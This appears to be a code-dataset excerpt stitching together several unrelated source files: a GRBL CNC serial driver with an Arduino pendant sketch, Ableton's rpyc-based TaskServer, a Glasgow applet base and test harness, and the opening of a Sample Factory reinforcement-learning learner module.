try:
if tag != 'state' and not self.tags['state']['Value']: #is disconnected, return None
raise KeyError
results[tag] = self.tags[tag]
results[tag]['Timestamp'] = ts
except KeyError:
pass
return results
def write(self, tag, val):
#catch all for controller writes
if tag.startswith("$"):
self.realtime_cmd = "{}={}".format(tag,val) #settings tags
self.settings_read_req = True
return
if tag in self.tags:
self.tags[tag]["Value"] = DATATYPES[self.tags[tag]["DataType"]]["Py_type"](val) #cast val to that type
return
if tag == 'resume_cmd':
self.realtime_cmd = "~\n"
return
if tag == 'hold_cmd':
self.realtime_cmd = "!\n"
return
if tag == 'reset_cmd':
self.realtime_cmd = "\x18\n"
self.blocks_to_send = self.blocks_to_send_private = []
return
if tag == 'alm_reset_cmd':
self.realtime_cmd = "$X\n"
return
if tag == 'home_cmd':
self.realtime_cmd = "$H\n"
return
if tag == 'jog-X-pos':
self.realtime_cmd = "$J=G91X{}F{}\n".format(self.tags["jogdist-X"]['Value'], self.tags["jogspeed-X"]['Value'])
return
if tag == 'jog-X-neg':
self.realtime_cmd = "$J=G91X-{}F{}\n".format(self.tags["jogdist-X"]['Value'], self.tags["jogspeed-X"]['Value'])
return
if tag == 'jog-Y-pos':
self.realtime_cmd = "$J=G91Y{}F{}\n".format(self.tags["jogdist-Y"]['Value'], self.tags["jogspeed-Y"]['Value'])
return
if tag == 'jog-Y-neg':
self.realtime_cmd = "$J=G91Y-{}F{}\n".format(self.tags["jogdist-Y"]['Value'], self.tags["jogspeed-Y"]['Value'])
return
if tag == 'jog-Z-pos':
self.realtime_cmd = "$J=G91Z{}F{}".format(self.tags["jogdist-Z"]['Value'], self.tags["jogspeed-Z"]['Value'])
return
if tag == 'jog-Z-neg':
self.realtime_cmd = "$J=G91Z-{}F{}\n".format(self.tags["jogdist-Z"]['Value'], self.tags["jogspeed-Z"]['Value'])
return
if tag == 'home-X':
self.blocks_to_send.append("G10P0L20X{}".format(val))
return
if tag == 'home-Y':
self.blocks_to_send.append("G10P0L20Y{}".format(val))
return
if tag == 'home-Z':
self.blocks_to_send.append("G10P0L20Z{}".format(val))
return
if tag == 'gcode-line':
if val.startswith("$"):
self.realtime_cmd = "{}\n".format(val)
else:
self.blocks_to_send.append(val)
return
if tag == 'gcode-program':
self.send_gcode(val)
return
if tag.startswith('override-'):
cmds = {"feed-100" : b"\x90",
"feed-inc-10" : b"\x91",
"feed-dec-10" : b"\x92",
"feed-inc-1" : b"\x93",
"feed-dec-1" : b"\x94",
"rapids-100" : b"\x95",
"rapids-50" : b"\x96",
"rapids-25" : b"\x97",
"spindle-100" : b"\x99",
"spindle-inc-10" : b"\x9A",
"spindle-dec-10" : b"\x9B",
"spindle-inc-1" : b"\x9C",
"spindle-dec-1" : b"\x9D",
}
_cmd = cmds.get(tag.replace('override-', ''))
if _cmd:
self.realtime_cmd =(_cmd)
return
if tag in ['manual-cmd-X', 'manual-cmd-Y', 'manual-cmd-Z']:
self.manual_toggle(tag)
return
#if write command isn't identified that throw alarm
event_msg = "Unhandled connection write in CNC: {}".format(tag)
self.connection_manager.emit("new_event", event_msg)
def send_gcode(self, gcode):
while(self.block_lock):
pass
self.block_lock = True
for line in gcode.split('\n'):
line = line.strip('\r')
self.blocks_to_send.append(line)
self.block_lock = False
def manual_toggle(self, cmd):
#print(self.tags['manual-X'])
if self.tags['state']["Value"] != 1:
return
axis = cmd.replace('manual-cmd-',"")
state = self.tags['manual-{}'.format(axis)]["Value"]
for a in ["X","Y","Z"]:
self.tags['manual-{}'.format(a)]["Value"] = False
if not state: #was off, turn on
self.tags['manual-{}'.format(axis)]["Value"] = True
self.tags['manual-ticks-init']["Value"] = self.tags['pendant-ticks']["Value"]
self.tags['manual-sp-init']["Value"] = self.tags['WPos-{}'.format(axis)]["Value"]
#print(self.tags['manual-X'],type(self.tags['manual-X']['Value']))
self.update_manual_vals()
def update_manual_vals(self):
for axis in ["X","Y","Z"]:
if self.tags['manual-{}'.format(axis)]["Value"]:
sp = self.tags['manual-sp-init']["Value"] - (self.tags['manual-ticks-init']["Value"]-self.tags['pendant-ticks']["Value"]) / (self.tags['pendant-mm-rev']["Value"])
speed = self.tags['jogspeed-{}'.format(axis)]["Value"]
self.realtime_cmd = '$J=G90{}{}F{}\n'.format(axis, sp, speed)
self.tags['manual-{}-sp'.format(axis)]["Value"] = sp
else:
self.tags['manual-{}-sp'.format(axis)]["Value"] = self.tags['WPos-{}'.format(axis)]["Value"]
def connectDevice(self,*args):
self.connect_cmd = True
if not self.poll_thread.is_alive():
self.poll_thread = threading.Thread(target=self.poll, args=(self,))
self.poll_thread.daemon=True
self.poll_thread.start()
def disconnectDevice(self,*args):
self.connect_cmd = False
while self.poll_thread.is_alive():
time.sleep(0.01)
if self.connection_handle:
self.connection_handle.close()
self.connection_handle = None
self.tags['state']["Value"] = 0
def update_conn_settings(self,db,setting,val,*args):
if setting == 'PORT':
self.port = val
self.db_manager.set_db_val_by_id(db,setting,self.id,val) #update memory db
self.db_manager.copy_table(db) #update main db
def poll(self, *args):
self.connection_handle = None
tx_id = 0
while(self.connect_cmd): #while polling
t=time.time()
while(self.block_lock):
pass
self.block_lock = True
self.blocks_to_send_private += self.blocks_to_send
self.blocks_to_send = []
self.block_lock = False
if not self.connection_handle:
try:
self.connection_handle = serial.Serial(self.port, 115200, timeout=0.1)
except Exception as e:
if not self.connection_err:
event_msg = "CNC Controller comm err: {}".format(e)
self.connection_manager.emit("new_event", event_msg)
self.connection_err = True
self.tags['state'].update({"Value": 0, 'Timestamp': t})
self.connection_handle = None
if self.connection_handle:
self.connection_err = False
if 1: #try:
if self.realtime_cmd:
if type(self.realtime_cmd) == bytes:
self.connection_handle.write(self.realtime_cmd + "\n".format().encode("ascii"))
else:
self.connection_handle.write("{}\n".format(self.realtime_cmd).encode("ascii"))
self.realtime_cmd = None
if self.settings_read_req:
self.connection_handle.write("$$\n".encode("ascii")) # triggers a read of all settings
chars_sent = 0
for block in self.blocks_sent:
chars_sent += len(block)
buff_avail = CNC_BUFFER_SZ - chars_sent
while len(self.blocks_to_send_private) and len(self.blocks_to_send_private[0]) <= buff_avail:
block = self.blocks_to_send_private.pop(0)
buff_avail -= len(block)
self.connection_handle.write("{}\n".format(block).encode("ascii"))
self.blocks_sent = [block] + self.blocks_sent
self.connection_handle.write("?\n".encode("ascii"))
data = ''
tag_update = {}
self.update_manual_vals()
tag_update.update(self.tags)
keep_going = 1
while keep_going:
b = self.connection_handle.read()
keep_going = len(b)
data+=b.decode('ascii')
lines = data.split('\r\n')
for line in lines:
if line.startswith("<"):
update = re.split(r'\|', re.sub("\r", "", re.sub("\n", "", re.sub("\<", "", re.sub("\>", "", line)))))
if "WCO:" in line:
self.update_tag('spindle-run', 0, t)
self.update_tag('coolant', 0, t)
for pin in 'XYZPDHRS':
self.update_tag(f'pin-{pin}', 0, t)#init pins, if on it will get updated
for idx, field in enumerate(update):
if (idx==0):
self.update_tag('state', self.state_enum[field], t)
elif (field.startswith('MPos:')):
_x,_y,_z = field.replace('MPos:', "").split(',')
self.update_tag('MPos-X', _x, t)
self.update_tag('MPos-Y', _y, t)
self.update_tag('MPos-Z', _z, t)
_x,_y,_z = [float(self.tags['MPos-X']["Value"])-self.WCO[0], float(self.tags['MPos-Y']["Value"])-self.WCO[1], float(self.tags['MPos-Z']["Value"])-self.WCO[2]]
self.update_tag('WPos-X', _x, t)
self.update_tag('WPos-Y', _y, t)
self.update_tag('WPos-Z', _z, t)
elif (field.startswith('Bf:')):
_b,_c = field.replace('Bf:', "").split(',')
self.update_tag('block-in-avail', _b, t)
self.update_tag('chars-avail', _c, t)
elif (field.startswith('F:')):
self.update_tag('spindle-speed', field.replace('F:', ""), t)
elif (field.startswith('FS:')):
_f, _s = field.replace('FS:', "").split(',')
self.update_tag('feedrate', _f, t)
self.update_tag('spindle-speed', _s, t)
elif (field.startswith('WCO:')):
self.WCO = list(map(lambda s: float(s), field.replace('WCO:', "").split(',')))
for idx, axis in enumerate('xyz'):
self.update_tag(f'WCO-{axis.upper()}', self.WCO[idx], t)
elif (field.startswith('Pn:')):
for pin in field.replace('Pn:', ""):
self.update_tag(f'pin-{pin}', 1, t)
elif (field.startswith('Ov:')):
_orf, _orr, _ors = field.replace('Ov:', "").split(',')
self.update_tag('override-feed', _orf, t)
self.update_tag('override-rapids', _orr, t)
self.update_tag('override-spindle', _ors, t)
elif (field.startswith('A:')):
for acc in field.replace('A:', "").split(','):
if acc == "S": self.update_tag('spindle-run', 1, t) #FWD
if acc == "C": self.update_tag('spindle-run', -1, t) #REV
if acc == "F": self.update_tag('coolant', 1, t) #FLOOD
if acc == "M": self.update_tag('coolant', 2, t) #MIST
else:
event_msg = "CNC Controller field unhandled: {}".format(field)
self.connection_manager.emit("new_event", event_msg)
if line == 'ok':
block_in = len(self.blocks_sent)
if block_in:
self.blocks_sent = self.blocks_sent[1:]
if line.startswith('Grbl'):
pass #connected
if line.startswith("$"):
self.settings_read_req = False
setting, setting_val = line.split("=")
self.update_tag(setting, setting_val, t)
else: #except Exception as e:
self.disconnectDevice()
dt = time.time()-t
to = max(0.1, (self.pollrate - dt)) if self.connection_handle else 1.0
time.sleep(to)
class Pendant(object):
def __init__(self, cnc_connection, port,manager):
self.connection_manager = manager
self.port = port
self.cnc = cnc_connection
self.connection_err = False
self.poll_thread = threading.Thread(target=self.poll, args=(self,))
self.poll_thread.daemon=True
self.poll_thread.start()
def poll(self, *args):
ser = None
while(1): #while polling
if not ser:
try:
ser = serial.Serial(self.port, 115200, timeout=0.1)
except Exception as e:
if not self.connection_err:
event_msg = "CNC Pendant comm err: {}".format(e)
self.connection_manager.emit("new_event", event_msg)
self.connection_err = True
ser = None
if ser:
self.connection_err = False
try:
ser.write("?".encode("ascii"))
data = b''
keep_going = 1
while keep_going:
b = ser.read()
keep_going = len(b)
data+=b
self.cnc.tags["pendant-ticks"] = struct.unpack('l', data)[0]
except Exception as e:
self.cnc.tags["pendant-ticks"] = None
event_msg = 'Pendant read error'
self.connection_manager.emit("new_event", event_msg)
to = 0.2 if ser else 1.0
time.sleep(to)
""" Pendant program
#define TICKS_INIT 2147483648UL
#define A_pin 2
#define B_pin 3
volatile uint32_t ticks_abs = TICKS_INIT;
volatile int32_t ticks = ticks_abs - TICKS_INIT;
String readString;
void setup() {
Serial.begin(115200);
pinMode(A_pin, INPUT_PULLUP);
pinMode(B_pin, INPUT_PULLUP);
attachInterrupt(digitalPinToInterrupt(A_pin), tick, CHANGE);
}
void loop() {
while (Serial.available()) {
delay(2); //delay to allow byte to arrive in input buffer
char c = Serial.read();
readString += c;
}
if (readString.equals(String("?"))) {
Serial.write((uint8_t *)&ticks, 4);
}
readString="";
}
void tick() {
bool a = digitalRead(A_pin);
bool b = digitalRead(B_pin);
if(a == b){
ticks_abs--;
} else {
ticks_abs++;
}
ticks = ticks_abs - TICKS_INIT;
ticks = ticks/2;
}
"""
|
TaskServer.py
|
# -*- coding: utf-8 -*-
#****************************************************************************************
# File: TaskServer.py
#
# Copyright: 2013 Ableton AG, Berlin. All Rights reserved
#****************************************************************************************
import threading
from _Framework.Dependency import depends
from _Framework.Util import const, print_message
from _Framework import Task
import rpyc.lib.compat
from rpyc.utils.server import Server
from rpyc.core import SocketStream, Channel, Connection
from rpyc.utils.authenticators import AuthenticationError
RPYC_SUGGESTED_UPDATE_TIME = 0.01
RPYC_POLL_TIMEOUT = 0.01
RPYC_CLIENT_POLL_TIMEOUT = 0.01
RPYC_POLL_ATTEMPTS = 5
RPYC_READ_ATTEMPT_FACTOR = 0
RPYC_WRITE_ATTEMPT_FACTOR = 1
class TaskServer(Server):
@depends(log_message = const(print_message),
parent_task_group = None)
def __init__(self,
service,
log_message = None,
parent_task_group = None,
*a, **k):
super(TaskServer, self).__init__(
service,
*a, **k)
self._log_message = log_message
self._server_task = parent_task_group.add(self.tick_server).kill()
self._all_poll = rpyc.lib.compat.poll()
self._all_poll.register(self.listener.fileno(), 'r')
self._fd_to_conn = {}
self.log_message("server created")
def start(self):
self.listener.listen(self.backlog)
self.logger.info("server started on [%s]:%s", self.host, self.port)
self.active = True
if self.auto_register:
# [jbo] This is copied from the base class, but I am not
# sure it will work nor needed... embedded Python often
# needs special stuff to enable threading.
t = threading.Thread(target = self._bg_register)
t.setDaemon(True)
t.start()
self._server_task.restart()
self.log_message("server started")
def close(self):
self._server_task.kill()
super(TaskServer, self).close()
self.log_message("server stopped")
def log_message(self, *messages):
self._log_message("[%s]" % self.service.get_service_name(), *messages)
def tick_server(self, delta=None):
left_attempts = RPYC_POLL_ATTEMPTS
while left_attempts > 0:
try:
active = self._all_poll.poll(RPYC_POLL_TIMEOUT)
attempts = 1
for fd, evt in active:
if fd == self.listener.fileno():
self._handle_accept(fd, evt)
elif fd in self._fd_to_conn:
self._handle_serve(fd, evt)
if 'r' in evt:
attempts = RPYC_READ_ATTEMPT_FACTOR
elif 'w' in evt:
attempts = RPYC_WRITE_ATTEMPT_FACTOR
left_attempts -= attempts
except Exception, e:
# The select module on Windows throws a select.error exception when any
# of the elements in the select set is not a valid file descriptor any
# more. It doesn't tell us which one though, so we need to iterate over
# all fds and find out which ones no longer work.
#
# On Mac there's no such exception type (it only throws IOError there),
# so we need to do these string comparisons instead of catching the
# exception by type.
if e.__class__.__name__ == 'error' and e.__class__.__module__ == 'select':
self._drop_broken_sockets_on_windows()
else:
raise
return Task.RUNNING
def _drop_broken_sockets_on_windows(self):
import select
for fd in list(self._all_poll.rlist):
try:
select.select([fd], [], [], 0)
except select.error:
self._handle_drop(fd, '')
for fd in list(self._all_poll.wlist):
try:
select.select([], [fd], [], 0)
except select.error:
self._handle_drop(fd, '')
def _handle_drop(self, fd, ev):
self.log_message("client dropped", fd, ev)
try:
self._all_poll.unregister(fd)
conn = self._fd_to_conn[fd]
del self._fd_to_conn[fd]
conn.close()
except KeyError:
pass
def _handle_accept(self, fd, ev):
sock, addrinfo = self.listener.accept()
self.log_message("new client:", addrinfo)
self.clients.add(sock)
self._all_poll.register(sock.fileno(), 'rw')
conn = self._authenticate_and_build_connection(sock)
self._fd_to_conn[sock.fileno()] = conn
def _handle_serve(self, fd, ev):
try:
if 'e' in ev or 'h' in ev or 'n' in ev:
raise EOFError
self._fd_to_conn[fd].poll_all(RPYC_CLIENT_POLL_TIMEOUT)
except EOFError:
self._handle_drop(fd, ev)
def accept(self):
raise NotImplementedError, "we do not want the blocking version"
def _authenticate_and_build_connection(self, sock):
"""
Authenticate a client and if it succees, wraps the socket
in a connection object. Note that this code is cut and paste
from the rpyc internals and may have to be changed if rpyc
evolves
"""
# authenticate
if self.authenticator:
h, p = sock.getpeername()
try:
sock, credentials = self.authenticator(sock)
except AuthenticationError:
self.log_message(
"%s:%s failed to authenticate, rejecting connection",
h, p)
return None
else:
credentials = None
# build a connection
h, p = sock.getpeername()
config = dict(self.protocol_config,
credentials = credentials,
connid = "%s:%d" % (h, p))
return Connection(self.service,
Channel(SocketStream(sock)),
config = config)
|
__init__.py
|
import re
import argparse
from ..gateware.clockgen import *
__all__ = ["GlasgowAppletError", "GlasgowApplet", "GlasgowAppletTool"]
class GlasgowAppletError(Exception):
"""An exception raised when an applet encounters an error."""
class _GlasgowAppletMeta(type):
def __new__(metacls, clsname, bases, namespace, **kwargs):
# Any class that overrides interact() no longer has its superclass' custom REPL, so be
# helpful and reset that attribute.
if "has_custom_repl" not in namespace and "interact" in namespace:
namespace["has_custom_repl"] = False
return type.__new__(metacls, clsname, bases, namespace, **kwargs)
class GlasgowApplet(metaclass=_GlasgowAppletMeta):
all_applets = {}
def __init_subclass__(cls, name):
if name in cls.all_applets:
raise ValueError("Applet {!r} already exists".format(name))
cls.all_applets[name] = cls
cls.name = name
preview = False
help = "applet help missing"
description = "applet description missing"
required_revision = "A0"
has_custom_repl = False
@classmethod
def add_build_arguments(cls, parser, access):
access.add_build_arguments(parser)
def derive_clock(self, *args, clock_name=None, **kwargs):
try:
return ClockGen.derive(*args, **kwargs, logger=self.logger, clock_name=clock_name)
except ValueError as e:
if clock_name is None:
raise GlasgowAppletError(e)
else:
raise GlasgowAppletError("clock {}: {}".format(clock_name, e))
def build(self, target):
raise NotImplementedError
@classmethod
def add_run_arguments(cls, parser, access):
access.add_run_arguments(parser)
async def run_lower(self, cls, device, args, **kwargs):
return await super(cls, self).run(device, args, **kwargs)
async def run(self, device, args):
raise NotImplementedError
@classmethod
def add_interact_arguments(cls, parser):
pass
async def interact(self, device, args, interface):
pass
class GlasgowAppletTool:
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.tool_cls = cls
cls.applet_cls = applet
cls.logger = applet.logger
@classmethod
def add_arguments(cls, parser):
pass
async def run(self, args):
pass
# -------------------------------------------------------------------------------------------------
import os
import shutil
import unittest
import functools
import asyncio
import threading
import inspect
import json
from nmigen.compat.sim import *
from ..access.simulation import *
from ..access.direct import *
from ..target.simulation import *
from ..target.hardware import *
from ..device.simulation import *
from ..device.hardware import *
from ..platform.all import GlasgowPlatformRevAB
__all__ += ["GlasgowAppletTestCase", "synthesis_test", "applet_simulation_test",
"applet_hardware_test"]
class MockRecorder:
def __init__(self, case, mocked, fixture):
self.__case = case
self.__mocked = mocked
self.__fixture = fixture
@staticmethod
def __dump_object(obj):
if isinstance(obj, bytes):
return {"__class__": "bytes", "hex": obj.hex()}
if isinstance(obj, bytearray):
return {"__class__": "bytearray", "hex": obj.hex()}
raise TypeError("%s is not serializable" % type(obj))
def __dump_stanza(self, stanza):
if not self.__case._recording:
return
json.dump(fp=self.__fixture, default=self.__dump_object, obj=stanza)
self.__fixture.write("\n")
def __dump_method(self, method, args, kwargs, result, coro):
self.__dump_stanza({
"method": method,
"async": coro,
"args": args,
"kwargs": kwargs,
"result": result
})
def __getattr__(self, attr):
mocked = getattr(self.__mocked, attr)
if inspect.ismethod(mocked):
def wrapper(*args, **kwargs):
result = mocked(*args, **kwargs)
if inspect.isawaitable(result):
async def coro_wrapper():
coro_result = await result
self.__dump_method(attr, args, kwargs, coro_result, coro=True)
return coro_result
return coro_wrapper()
else:
self.__dump_method(attr, args, kwargs, result, coro=False)
return result
return wrapper
return mocked
class MockReplayer:
def __init__(self, case, fixture):
self.__case = case
self.__fixture = fixture
@staticmethod
def __load_object(obj):
if "__class__" not in obj:
return obj
if obj["__class__"] == "bytes":
return bytes.fromhex(obj["hex"])
if obj["__class__"] == "bytearray":
return bytearray.fromhex(obj["hex"])
assert False
def __load(self):
json_str = self.__fixture.readline()
return json.loads(s=json_str, object_hook=self.__load_object)
def __getattr__(self, attr):
json_obj = self.__load()
self.__case.assertEqual(attr, json_obj["method"])
if json_obj["async"]:
async def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
else:
def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
return mock
class GlasgowAppletTestCase(unittest.TestCase):
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.test_cls = cls
cls.applet_cls = applet
def setUp(self):
self.applet = self.applet_cls()
def assertBuilds(self, access="direct", args=[]):
if access == "direct":
target = GlasgowHardwareTarget(revision="A0",
multiplexer_cls=DirectMultiplexer)
access_args = DirectArguments(applet_name=self.applet.name,
default_port="AB", pin_count=16)
else:
raise NotImplementedError
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
parsed_args = parser.parse_args(args)
self.applet.build(target, parsed_args)
target.build_plan().execute()
def _prepare_applet_args(self, args, access_args, interact=False):
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
self.applet.add_run_arguments(parser, access_args)
if interact:
self.applet.add_interact_arguments(parser)
self._parsed_args = parser.parse_args(args)
def _prepare_simulation_target(self):
self.target = GlasgowSimulationTarget()
self.target.submodules.multiplexer = SimulationMultiplexer()
self.device = GlasgowSimulationDevice(self.target)
self.device.demultiplexer = SimulationDemultiplexer(self.device)
def build_simulated_applet(self):
self.applet.build(self.target, self._parsed_args)
async def run_simulated_applet(self):
return await self.applet.run(self.device, self._parsed_args)
def _prepare_hardware_target(self, case, fixture, mode):
assert mode in ("record", "replay")
if mode == "record":
self.device = GlasgowHardwareDevice()
self.device.demultiplexer = DirectDemultiplexer(self.device)
revision = self.device.revision
else:
self.device = None
revision = "A0"
self.target = GlasgowHardwareTarget(revision=revision,
multiplexer_cls=DirectMultiplexer)
self.applet.build(self.target, self._parsed_args)
self._recording = False
self._recorders = []
async def run_lower(cls, device, args):
if cls is type(self.applet):
if mode == "record":
lower_iface = await super(cls, self.applet).run(device, args)
recorder = MockRecorder(case, lower_iface, fixture)
self._recorders.append(recorder)
return recorder
if mode == "replay":
return MockReplayer(case, fixture)
else:
return await super(cls, self.applet).run(device, args)
self.applet.run_lower = run_lower
async def run_hardware_applet(self, mode):
if mode == "record":
await self.device.download_target(self.target)
return await self.applet.run(self.device, self._parsed_args)
def synthesis_test(case):
synthesis_available = (shutil.which("yosys") is not None and
shutil.which("arachne-pnr") is not None)
return unittest.skipUnless(synthesis_available, "synthesis not available")(case)
def applet_simulation_test(setup, args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
access_args = SimulationArguments(self.applet)
self._prepare_applet_args(args, access_args)
self._prepare_simulation_target()
getattr(self, setup)()
vcd_name = "{}.vcd".format(case.__name__)
run_simulation(self.target, case(self), vcd_name=vcd_name)
os.remove(vcd_name)
return wrapper
return decorator
def applet_hardware_test(setup="run_hardware_applet", args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
fixture_path = os.path.join(os.path.dirname(case.__code__.co_filename), "fixtures",
case.__name__ + ".json")
os.makedirs(os.path.dirname(fixture_path), exist_ok=True)
if os.path.exists(fixture_path):
fixture = open(fixture_path, "r")
mode = "replay"
else:
fixture = open(fixture_path, "w")
mode = "record"
try:
access_args = DirectArguments(self.applet, default_port="AB", pin_count=16)
self._prepare_applet_args(args, access_args)
self._prepare_hardware_target(self, fixture, mode)
exception = None
def run_test():
try:
loop = asyncio.new_event_loop()
iface = loop.run_until_complete(getattr(self, setup)(mode))
self._recording = True
loop.run_until_complete(case(self, iface))
except Exception as e:
nonlocal exception
exception = e
thread = threading.Thread(target=run_test)
thread.start()
thread.join()
if exception is not None:
raise exception
except:
if mode == "record":
os.remove(fixture_path)
raise
finally:
if mode == "record":
self.device.usb.close()
return wrapper
return decorator
|
learner.py
|
from abc import abstractmethod, ABC
from typing import Tuple, Optional
import glob
import os
import shutil
import signal
import threading
import time
from collections import OrderedDict, deque
from os.path import join
from queue import Empty, Queue, Full
from threading import Thread
import numpy as np
import psutil
import torch
from torch.nn.utils.rnn import PackedSequence, invert_permutation
from torch.multiprocessing import Process, Event as MultiprocessingEvent
if os.name == 'nt':
from sample_factory.utils import Queue as MpQueue
else:
from faster_fifo import Queue as MpQueue
from sample_factory.algorithms.appo.appo_utils import TaskType, list_of_dicts_to_dict_of_lists, memory_stats, \
cuda_envvars_for_policy, \
TensorBatcher, iter_dicts_recursively, copy_dict_structure, ObjectPool, iterate_recursively
from sample_factory.algorithms.appo.model import create_actor_critic
from sample_factory.algorithms.appo.aux_losses import CPCA
from sample_factory.algorithms.appo.population_based_training import PbtTask
from sample_factory.algorithms.utils.action_distributions import get_action_distribution, is_continuous_action_space
from sample_factory.algorithms.utils.algo_utils import calculate_gae, EPS
from sample_factory.algorithms.utils.pytorch_utils import to_scalar
from sample_factory.utils.decay import LinearDecay
from sample_factory.utils.timing import Timing
from sample_factory.utils.utils import log, AttrDict, experiment_dir, ensure_dir_exists, join_or_kill, safe_get, safe_put
# noinspection PyPep8Naming
def _build_pack_info_from_dones(dones: torch.Tensor, T: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
"""
Create the indexing info needed to make the PackedSequence based on the dones.
PackedSequences are PyTorch's way of supporting a single RNN forward
call where each input in the batch can have an arbitrary sequence length
They work as follows: Given the sequences [c], [x, y, z], [a, b],
we generate data [x, a, c, y, b, z] and batch_sizes [3, 2, 1]. The
data is a flattened out version of the input sequences (the ordering in
data is determined by sequence length). batch_sizes tells you that
for each index, how many sequences have a length of (index + 1) or greater.
This method will generate the new index ordering such that you can
construct the data for a PackedSequence from a (N*T, ...) tensor
via x.index_select(0, select_inds)
"""
num_samples = len(dones)
rollout_boundaries = dones.clone().detach()
rollout_boundaries[T - 1::T] = 1 # end of each rollout is the boundary
rollout_boundaries = rollout_boundaries.nonzero(as_tuple=False).squeeze(dim=1) + 1
first_len = rollout_boundaries[0].unsqueeze(0)
if len(rollout_boundaries) <= 1:
log.debug('Only one rollout boundary. This can happen if batch size is 1, probably not during the real training.')
rollout_lengths = first_len
else:
rollout_lengths = rollout_boundaries[1:] - rollout_boundaries[:-1]
rollout_lengths = torch.cat([first_len, rollout_lengths])
rollout_starts_orig = rollout_boundaries - rollout_lengths
# done=True for the last step in the episode, so done flags rolled 1 step to the right will indicate
# first frames in the episodes
is_new_episode = dones.clone().detach().view((-1, T))
is_new_episode = is_new_episode.roll(1, 1)
# roll() is cyclical, so done=True in the last position in the rollout will roll to 0th position
# we want to avoid it here. (note to self: is there a function that does two of these things at once?)
is_new_episode[:, 0] = 0
is_new_episode = is_new_episode.view((-1, ))
lengths, sorted_indices = torch.sort(rollout_lengths, descending=True)
# We will want these on the CPU for torch.unique_consecutive,
# so move now.
cpu_lengths = lengths.to(device='cpu', non_blocking=True)
# We need to keep the original unpermuted rollout_starts, because the permutation is later applied
# internally in the RNN implementation.
# From modules/rnn.py:
# Each batch of the hidden state should match the input sequence that
# the user believes he/she is passing in.
# hx = self.permute_hidden(hx, sorted_indices)
rollout_starts_sorted = rollout_starts_orig.index_select(0, sorted_indices)
select_inds = torch.empty(num_samples, device=dones.device, dtype=torch.int64)
max_length = int(cpu_lengths[0].item())
# batch_sizes is *always* on the CPU
batch_sizes = torch.empty((max_length,), device='cpu', dtype=torch.int64)
offset = 0
prev_len = 0
num_valid_for_length = lengths.size(0)
unique_lengths = torch.unique_consecutive(cpu_lengths)
# Iterate over all unique lengths in reverse as they sorted
# in decreasing order
for i in range(len(unique_lengths) - 1, -1, -1):
valids = lengths[0:num_valid_for_length] > prev_len
num_valid_for_length = int(valids.float().sum().item())
next_len = int(unique_lengths[i])
batch_sizes[prev_len:next_len] = num_valid_for_length
new_inds = (
rollout_starts_sorted[0:num_valid_for_length].view(1, num_valid_for_length)
+ torch.arange(prev_len, next_len, device=rollout_starts_sorted.device).view(next_len - prev_len, 1)
).view(-1)
# for a set of sequences [1, 2, 3], [4, 5], [6, 7], [8]
# these indices will be 1,4,6,8,2,5,7,3
# (all first steps in all trajectories, then all second steps, etc.)
select_inds[offset:offset + new_inds.numel()] = new_inds
offset += new_inds.numel()
prev_len = next_len
# Make sure we have an index for all elements
assert offset == num_samples
assert is_new_episode.shape[0] == num_samples
return rollout_starts_orig, is_new_episode, select_inds, batch_sizes, sorted_indices
def build_rnn_inputs(x, dones_cpu, rnn_states, T: int):
"""
Create a PackedSequence input for an RNN such that each
set of steps that are part of the same episode are all part of
a batch in the PackedSequence.
Use the returned select_inds and build_core_out_from_seq to invert this.
:param x: A (N*T, -1) tensor of the data to build the PackedSequence out of
:param dones_cpu: A (N*T) tensor where dones[i] == 1.0 indicates an episode is done, a CPU-bound tensor
:param rnn_states: A (N*T, -1) tensor of the rnn_hidden_states
:param T: The length of the rollout
:return: tuple(x_seq, rnn_states, select_inds)
WHERE
x_seq is the PackedSequence version of x to pass to the RNN
rnn_states are the corresponding rnn state, zeroed on the episode boundary
inverted_select_inds can be passed to build_core_out_from_seq so the RNN output can be retrieved
"""
rollout_starts, is_new_episode, select_inds, batch_sizes, sorted_indices = _build_pack_info_from_dones(dones_cpu, T)
inverted_select_inds = invert_permutation(select_inds)
def device(t):
return t.to(device=x.device)
select_inds = device(select_inds)
inverted_select_inds = device(inverted_select_inds)
sorted_indices = device(sorted_indices)
rollout_starts = device(rollout_starts)
is_new_episode = device(is_new_episode)
x_seq = PackedSequence(x.index_select(0, select_inds), batch_sizes, sorted_indices)
# We zero-out rnn states for timesteps at the beginning of the episode.
# rollout_starts are indices of all starts of sequences
# (which can be due to episode boundary or just boundary of a rollout)
# (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts) gives us a zero for every beginning of
# the sequence that is actually also a start of a new episode, and by multiplying this RNN state by zero
# we ensure no information transfer across episode boundaries.
rnn_states = rnn_states.index_select(0, rollout_starts)
is_same_episode = (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts)
rnn_states = rnn_states * is_same_episode
return x_seq, rnn_states, inverted_select_inds
def build_core_out_from_seq(x_seq: PackedSequence, inverted_select_inds):
return x_seq.data.index_select(0, inverted_select_inds)
class LearningRateScheduler:
def update(self, current_lr, recent_kls):
return current_lr
def invoke_after_each_minibatch(self):
return False
def invoke_after_each_epoch(self):
return False
class KlAdaptiveScheduler(LearningRateScheduler, ABC):
def __init__(self, cfg):
self.lr_schedule_kl_threshold = cfg.lr_schedule_kl_threshold
self.min_lr = 1e-6
self.max_lr = 1e-2
@abstractmethod
def num_recent_kls_to_use(self) -> int:
pass
def update(self, current_lr, recent_kls):
num_kls_to_use = self.num_recent_kls_to_use()
kls = recent_kls[-num_kls_to_use:]
mean_kl = np.mean(kls)
lr = current_lr
if mean_kl > 2.0 * self.lr_schedule_kl_threshold:
lr = max(current_lr / 1.5, self.min_lr)
if mean_kl < (0.5 * self.lr_schedule_kl_threshold):
lr = min(current_lr * 1.5, self.max_lr)
return lr
class KlAdaptiveSchedulerPerMinibatch(KlAdaptiveScheduler):
